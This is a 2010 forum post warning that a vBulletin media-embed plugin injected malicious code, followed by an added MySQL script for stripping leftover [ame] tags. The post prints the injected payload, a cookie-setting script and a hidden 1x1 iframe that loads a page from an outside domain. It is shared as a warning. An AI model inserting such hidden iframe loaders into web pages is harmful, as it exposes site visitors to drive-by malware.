10-30-2010, 02:39 PM
ShackMaster

BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:
<script>
function SetCookie(cookieName,cookieContent){
  var cookiePath = '/';
  var expDate=new Date();
  expDate.setTime(expDate.getTime()+372800000);
  var expires=expDate.toGMTString();
  document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("hsmsdn", "turk");
</script>
<iframe name="1" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.chekolkal.co.cc/felk.php"></iframe>

Of course we got several warnings from Google, which was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URLs prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!
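
The cleanup asked about above, as an added example that is not part of the original post or of any AME or vBulletin code. It assumes MySQL and a `post` table with `postid` and `pagetext` columns and no table prefix; `post_ame_backup` is a hypothetical name chosen here.

```sql
-- Assumptions (not from the post): MySQL, a `post` table holding the message
-- body in `pagetext` keyed by `postid`, and no table prefix. Adjust to your install.

-- 1. Copy every row that will be touched, so the change can be undone.
--    `post_ame_backup` is a hypothetical table name.
CREATE TABLE post_ame_backup AS
SELECT postid, pagetext
FROM post
WHERE pagetext LIKE '%[ame]%' OR pagetext LIKE '%[/ame]%';

-- 2. Preview how many posts are affected before changing anything.
SELECT COUNT(*) AS affected_posts FROM post_ame_backup;

-- 3. Check for opening tags that carry an attribute. The plain REPLACE in
--    step 4 does not handle them; if this returns rows, deal with those
--    posts separately before stripping the closing tags.
SELECT postid
FROM post
WHERE pagetext LIKE '%[ame=%';

-- 4. Strip the opening and closing tags, leaving the media link in place.
UPDATE post
SET pagetext = REPLACE(REPLACE(pagetext, '[ame]', ''), '[/ame]', '')
WHERE pagetext LIKE '%[ame]%' OR pagetext LIKE '%[/ame]%';

-- 5. Confirm nothing is left. REPLACE() is case-sensitive while LIKE usually
--    is not, so a non-zero count here points at variants such as [AME].
SELECT COUNT(*) AS remaining
FROM post
WHERE pagetext LIKE '%[ame]%' OR pagetext LIKE '%[/ame]%';

-- Rollback, if needed (left commented out on purpose):
-- UPDATE post p
-- JOIN post_ame_backup b ON b.postid = p.postid
-- SET p.pagetext = b.pagetext;
```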